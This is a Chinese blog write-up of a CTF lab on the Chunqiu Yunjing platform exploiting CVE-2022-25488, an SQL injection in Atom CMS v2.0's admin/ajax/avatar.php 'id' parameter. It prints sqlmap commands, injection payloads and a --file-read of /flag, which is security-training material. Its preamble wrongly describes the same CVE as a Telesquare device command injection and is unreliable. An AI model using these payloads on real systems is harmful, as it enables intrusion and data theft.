Atom CMS v2.0 SQL 注入漏洞(CVE-2022-25488)

前言

CVE-2022-25488 是一個發現于 Telesquare SDT-CW3B1 設備中的命令注入漏洞。這一漏洞可以被未經認證的遠程攻擊者利用,通過特殊構造的 HTTP 請求在設備上執行任意命令。以下是關于該漏洞的詳細信息:

漏洞詳細信息

  • 漏洞編號: CVE-2022-25488
  • 影響范圍: Telesquare SDT-CW3B1 設備的特定版本
  • 描述: 該漏洞是由于輸入處理不當造成的,攻擊者可以通過在 HTTP 請求中注入惡意命令來利用這一漏洞。這些命令將在設備的操作系統中執行,可能導致設備完全被攻擊者控制。
  • 攻擊向量: 遠程,未經認證的攻擊者可以通過網絡利用此漏洞。

攻擊步驟

  1. 發送惡意 HTTP 請求: 攻擊者構造一個特定的 HTTP 請求,包含惡意命令。
  2. 命令注入: 由于設備在處理請求時未正確驗證輸入,惡意命令被注入并在設備上執行。
  3. 控制設備: 成功利用漏洞后,攻擊者可以在設備上執行任意命令,可能導致數據泄露、設備中斷或進一步的網絡攻擊。

影響

  • 機密性: 高。攻擊者可以訪問和泄露設備上的敏感數據。
  • 完整性: 高。攻擊者可以修改或破壞設備上的數據。
  • 可用性: 高。攻擊者可以使設備無法正常工作。

緩解措施

  1. 固件更新: 制造商發布補丁或固件更新以修復此漏洞。用戶應及時更新設備固件。
  2. 網絡安全措施: 在網絡邊界實施防火墻和入侵檢測系統,監控和阻止可疑的網絡流量。
  3. 輸入驗證: 開發人員應確保在處理用戶輸入時進行嚴格的驗證和過濾,防止命令注入攻擊。
  4. 最小權限原則: 設備應配置為僅允許必要的權限,減少被利用的風險。

總結

CVE-2022-25488 是一個嚴重的命令注入漏洞,攻擊者可以通過網絡遠程利用該漏洞,在受影響的 Telesquare SDT-CW3B1 設備上執行任意命令。用戶應盡快采取措施,更新設備固件并實施必要的安全防護措施,以防止潛在的攻擊。

春秋云鏡靶場是一個專注于網絡安全培訓和實戰演練的平臺,旨在通過模擬真實的網絡環境和攻擊場景,提升用戶的網絡安全防護能力和實戰技能。這個平臺主要提供以下功能和特點:

實戰演練:

提供各種網絡安全攻防演練場景,模擬真實的網絡攻擊事件,幫助用戶在實際操作中掌握網絡安全技術。
場景涵蓋Web安全、系統安全、網絡安全、社工攻擊等多個領域。

漏洞復現:

用戶可以通過平臺對已知的安全漏洞進行復現,了解漏洞的產生原因、利用方法和修復措施。
通過實戰操作,幫助用戶掌握漏洞利用和防護的技能。

教學培訓:

提供系統化的網絡安全課程,從基礎到高級,覆蓋多個安全領域,適合不同水平的用戶。
包含理論講解和實戰操作,幫助學員全面提升網絡安全知識和實戰能力。

競賽與評測:

定期舉辦網絡安全競賽,如CTF(Capture The Flag)比賽,激發學員的學習興趣和動力。
提供個人和團隊的安全能力評測,幫助學員了解自己的安全技能水平。

資源共享:

平臺提供豐富的學習資源,包括教程、工具、案例分析等,方便用戶隨時查閱和學習。
用戶可以在社區中分享經驗和資源,互相交流和學習。

春秋云鏡靶場適合網絡安全從業人員、學生以及對網絡安全感興趣的個人,通過在平臺上進行不斷的學習和實戰演練,可以有效提升網絡安全技能和防護能力。

介紹

Atom CMS v2.0 是一款內容管理系統,用于創建和管理網站內容。以下是關于 Atom CMS v2.0 的詳細介紹:

概述

Atom CMS v2.0 是一個開源的內容管理系統,采用 PHP 和 MySQL 構建,旨在提供一個簡單易用的平臺,用于網站內容的創建、編輯和管理。該系統主要面向小型網站和博客,提供了豐富的功能以滿足基本的內容管理需求。

主要功能

  1. 用戶管理

    • 支持用戶注冊和登錄。
    • 角色和權限管理,區分管理員和普通用戶。
    • 用戶資料編輯和密碼管理。
  2. 文章管理

    • 創建、編輯和刪除文章。
    • 支持文章分類和標簽。
    • 支持富文本編輯器,便于格式化內容。
  3. 媒體管理

    • 上傳和管理圖片、視頻等多媒體文件。
    • 支持媒體文件的插入和刪除。
  4. 評論系統

    • 用戶可以對文章進行評論。
    • 管理員可以審核和刪除不當評論。
  5. SEO 優化

    • 自定義文章的標題、描述和關鍵詞。
    • 自動生成友好的 URL。
  6. 主題和插件

    • 支持自定義主題,用戶可以根據需要更改網站的外觀。
    • 支持插件擴展功能,增加系統的靈活性。

安全特性

  • 輸入驗證:對用戶輸入進行嚴格驗證,防止 SQL 注入和跨站腳本攻擊(XSS)。
  • 密碼加密:用戶密碼采用加密存儲,提高賬戶安全性。
  • 權限控制:細粒度的權限控制,確保用戶只能訪問授權的資源。

使用場景

  • 個人博客:適合個人博客的創建和管理,提供基本的文章發布和評論功能。
  • 小型企業網站:適合小型企業展示產品和服務,提供簡單的內容管理功能。
  • 教育網站:適合教育機構發布課程信息和新聞公告。

安裝和配置

  1. 下載源碼:從官方網站或 GitHub 下載最新版本的 Atom CMS v2.0 源碼。
  2. 環境配置:確保服務器環境支持 PHP 和 MySQL,推薦使用 Apache 或 Nginx 服務器。
  3. 數據庫配置:創建 MySQL 數據庫,并導入初始數據表。
  4. 配置文件:修改配置文件,設置數據庫連接信息和基本站點信息。
  5. 安裝向導:通過瀏覽器訪問安裝向導,完成系統安裝。

漏洞復現

打開靶場

直接訪問則是 404

跟上題目的路徑查看卻是空白

刪除 avatar.php 文件發現能看到整個目錄?

查看其他文件得到報錯信息

得到一個參數 id,使用 SQLMap 跟上試試

┌──(root?kali)-[~]
└─# sqlmap -u "http://eci-2ze5hr6ytbjlp9dcw4eb.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1"_____H_____ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:34:46 /2024-06-30/[20:34:47] [INFO] testing connection to the target URL
[20:34:47] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:34:47] [INFO] testing if the target URL content is stable
[20:34:47] [INFO] target URL content is stable
[20:34:47] [INFO] testing if GET parameter 'id' is dynamic
[20:34:47] [INFO] GET parameter 'id' appears to be dynamic
[20:34:47] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[20:34:47] [INFO] testing for SQL injection on GET parameter 'id'
[20:34:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:34:48] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[20:34:49] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[20:34:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:34:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:34:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:34:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:34:52] [INFO] testing 'Generic inline queries'
[20:34:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:34:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:34:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:34:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:35:03] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:35:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:35:03] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:35:03] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:35:03] [INFO] target URL appears to have 1 column in query
[20:35:03] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 4748=4748Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1 AND (SELECT 5831 FROM (SELECT(SLEEP(5)))vnsO)Type: UNION queryTitle: Generic UNION query (NULL) - 1 columnPayload: id=-9618 UNION ALL SELECT CONCAT(0x717a6b6b71,0x766c6652456c5a5861757461574161674d615374504a4e4e596861634252687778654452657a4b6d,0x7170717671)-- -
---
[20:35:05] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[20:35:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze5hr6ytbjlp9dcw4eb.cloudeci1.ichunqiu.com'[*] ending @ 20:35:05 /2024-06-30/

很好,接下來就是熟悉的找 flag 了

┌──(root?kali)-[~]
└─# sqlmap -u "http://eci-2ze5hr6ytbjlp9dcw4eb.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1" -D "mysql" --file-read "/flag"_____H_____ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:39:30 /2024-06-30/[20:39:30] [INFO] resuming back-end DBMS 'mysql' 
[20:39:30] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 4748=4748Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1 AND (SELECT 5831 FROM (SELECT(SLEEP(5)))vnsO)Type: UNION queryTitle: Generic UNION query (NULL) - 1 columnPayload: id=-9618 UNION ALL SELECT CONCAT(0x717a6b6b71,0x766c6652456c5a5861757461574161674d615374504a4e4e596861634252687778654452657a4b6d,0x7170717671)-- -
---
[20:39:30] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[20:39:30] [INFO] fingerprinting the back-end DBMS operating system
[20:39:30] [INFO] the back-end DBMS operating system is Linux
[20:39:30] [INFO] fetching file: '/flag'
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] n
files saved to [1]:
[*] /root/.local/share/sqlmap/output/eci-2ze5hr6ytbjlp9dcw4eb.cloudeci1.ichunqiu.com/files/_flag[20:39:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze5hr6ytbjlp9dcw4eb.cloudeci1.ichunqiu.com'[*] ending @ 20:39:32 /2024-06-30/┌──(root?kali)-[~]
└─# cat /root/.local/share/sqlmap/output/eci-2ze5hr6ytbjlp9dcw4eb.cloudeci1.ichunqiu.com/files/_flag
flag{810e4de0-b64a-4124-bddf-3554d6e60d15}          

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/38815.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/38815.shtml
英文地址,請注明出處:http://en.pswp.cn/web/38815.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

沃爾核材:價值重估

當英偉達這個曾經的GPU行業龍頭,伴隨AI的發展成為AI芯片架構的供應商時,他就跳出了原本行業的競爭格局,曾經還能與之一戰的超威半導體被遠遠甩在身后,成為宇宙第一公司。 這說的就是一家公司價值的重估。今天給大家聊的也是這樣一…

LIMS系統在汽車行業中的應用有哪些優勢

LIMS實驗室管理系統在汽車行業中的應用有諸多優勢,這些優勢不僅提升了實驗室的管理效率,還確保了數據的準確性和可靠性,進而促進了汽車行業的整體發展。 一、提升管理效率 自動化數據處理 LIMS系統能夠自動化處理大量數據,顯著減…

Python層次密度聚類算法庫之HDBSCAN使用詳解

概要 HDBSCAN 是一種層次密度聚類算法,它通過密度連接性來構建聚類層次結構。與傳統的 K-Means 算法相比,HDBSCAN 具有以下幾個顯著特點: 自動確定聚類數量:HDBSCAN 能夠根據數據自動確定聚類數量,不需要預先指定。 適應噪聲和異常點:HDBSCAN 在聚類過程中能夠很好地處理…

后端之路(集合項目)——結合案例正式搭建項目

在前面學完java后端的Maven、spring boot、Mysql、Mybatis之后,我們現在就應該集合它們開始搭建一個項目試試手了 這里我還是跟著黑馬程序員的步驟來走好每一步,也給各位講清楚怎么弄 先看一下這個圖,覺得太籠統不明白的話不著急&#xff0c…

Java面試題總結

Redis篇 什么是緩存穿透 ? 怎么解決 ? 緩存穿透是指查詢一個不存在的數據,如果從存儲層查不到數據則不寫入緩存,這將導致這個不存在的數據每次請求都要到 DB 去查詢,可能導致 DB 掛掉。這種情況大概率是遭到了攻擊。 解決方案有兩種&…

Arthas實戰(2)- OOM問題排查

一、 準備測試應用 新建一個 SpringBoot應用&#xff0c;寫一段有 OOM bug 的代碼&#xff1a; RestController RequestMapping public class JvmThreadController {List<TestWrapper> memoryList new ArrayList<>();GetMapping("/test")public Strin…

mov文件怎么轉換成mp4格式?這四種轉換方法超級好用!

mov文件怎么轉換成mp4格式&#xff1f;在數字娛樂的世界中&#xff0c;你是否曾遇到過MOV格式的視頻&#xff1f;也許&#xff0c;對于許多人來說&#xff0c;這并不是一個常見的格式&#xff0c;但這并非偶然&#xff0c;首先&#xff0c;我們來談談MOV的兼容性問題&#xff0…

使用python做飛機大戰

代碼地址: 點擊跳轉

不看測評盲買花了多少冤枉錢..測評希喂、愛立方、帕特看完不踩雷

主食凍在挑選主食凍干時&#xff0c;許多寵物主人都會感到頭疼。盡管主食凍干相較于普通貓糧具有諸多優勢&#xff0c;但其價格也相對高昂。這導致許多寵物主人擔心高價購買的主食凍干可能營養價值并不理想。然而&#xff0c;在選擇時&#xff0c;我們還需要考慮其他重要因素&a…

“穿越時空的機械奇觀:記里鼓車的歷史與科技探秘“

在人類文明的發展歷程中&#xff0c;科技的創新與進步不僅僅推動了社會的進步&#xff0c;也為我們留下了豐富的文化遺產。記里鼓車&#xff0c;作為一種古老的里程計量工具&#xff0c;其歷史地位和技術成就在科技史上具有重要的意義。本文將詳細介紹記里鼓車的起源、結構原理…

0基礎學C++ | 第10天 | 基礎知識 |程序的內存模型 | 4大分區

前言 第9天是一個通訊錄管理系統案例&#xff0c;現在了解程序的內存分區&#xff0c;C程序在執行時&#xff0c;將內存大方向分為了4個區域&#xff0c;分別是代碼區、全局區、棧區、堆區&#xff0c;分區的目的就是為了更加靈活的編程。 代碼區 and 全局區&#xff08;程序…

Echarts柱狀圖x軸刻度間隔顯示不全/x軸文字傾斜

此情況一般是因為x軸文字過長導致&#xff0c;知道什么原因&#xff0c;就可以解決了 在xAxis里面加 xAxis: {axisLabel: {interval: 0,rotate: -45 //文字過多時&#xff0c;傾斜角度}} 控制它的屬性是axisLabel&#xff0c;該屬性interva設置成0則表示強制顯示所有標簽&a…

這所985院校不保護一志愿,18人不合格被刷!西北農林科技大學計算機考研考情分析!

西北農林科技大學(Northwest A&F University)&#xff0c;簡稱“西農”或“西北農林”&#xff0c;始創于1934年&#xff0c;位于中華人民共和國陜西省楊凌示范區。1999年9月11日由同處楊凌的原西北農業大學、西北林學院、中國科學院水利部水土保持研究所、水利部西北水利科…

外籍學員報到,四川眼科醫院開啟國際屈光手術專科醫生培訓

“能夠來到中國、來到四川眼科醫院學習&#xff0c;我真的很幸運&#xff01;”這個夏天&#xff0c;對于馬來西亞眼科醫生Ivan Cheng En Yoo來說&#xff0c;充滿了期待和挑戰。他是首位來到四川眼科醫院進修學習的馬來西亞籍醫生&#xff0c;Ivan Cheng將在周進院長的帶領下&…

Android Gradle 開發與應用 (三): 依賴管理與版本控制

目錄 1. 依賴管理的重要性 1.1 依賴的類型 1.2 Gradle 中的依賴聲明 2. 版本控制的策略 2.1 固定版本與動態版本 2.2 版本沖突的解決 3. Gradle 插件的使用 3.1 常用的 Gradle 插件 3.2 自定義插件 4. 多模塊項目中的依賴管理 4.1 模塊間依賴 4.2 公共依賴 5. 依賴…

用“文心一言”寫的文章,看看AI寫得怎么樣?

?零售連鎖店的“支付結算”業務設計 在數字化浪潮的推動下&#xff0c;連鎖店零售支付結算的設計愈發重要。一個優秀的支付結算設計不僅能夠提升用戶體驗&#xff0c;還能增強品牌競爭力&#xff0c;進而促進銷售增長。 本文將圍繞一個具體的連鎖店零售支付結算案例&#xf…

數據結構第06節:棧

棧&#xff08;Stack&#xff09;是一種后進先出&#xff08;Last In First Out, LIFO&#xff09;的數據結構&#xff0c;它只允許在一端&#xff0c;稱為棧頂&#xff08;Top&#xff09;&#xff0c;進行添加&#xff08;Push&#xff09;和移除&#xff08;Pop&#xff09;…

MySql Innodb 索引有哪些與詳解

概述 對于MYSQL的INNODB存儲引擎的索引&#xff0c;大家是不陌生的&#xff0c;都能想到是 B樹結構&#xff0c;可以加速SQL查詢。但對于B樹索引&#xff0c;它到底“長”得什么樣子&#xff0c;它具體如何由一個個字節構成的&#xff0c;這些的基礎知識鮮有人深究。本篇文章從…

【Spring Boot】JPA 的查詢方式

JPA 的查詢方式 1.使用約定方法名2.用 JPQL 進行查詢3.用原生 SQL 進行查詢3.1 根據 ID 查詢用戶3.2 查詢所有用戶3.3 根據 email 查詢用戶3.4 根據 name 查詢用戶&#xff0c;并返回分頁對象 Page3.5 根據名字來修改 email 的值3.6 使用事務 4.用 Specifications 進行查詢5.用…

Mac視頻下載工具,兼容14系統,Downie 4軟件下載

Downie 4 是一款由James Application開發的視頻下載軟件&#xff0c;支持Mac操作系統。該軟件允許用戶從各種視頻網站上下載視頻內容&#xff0c;以便于在本地設備上觀看&#xff0c;無需依賴互聯網連接。自動下載&#xff1a;可以設置Downie 4自動下載指定網站上的視頻&#x…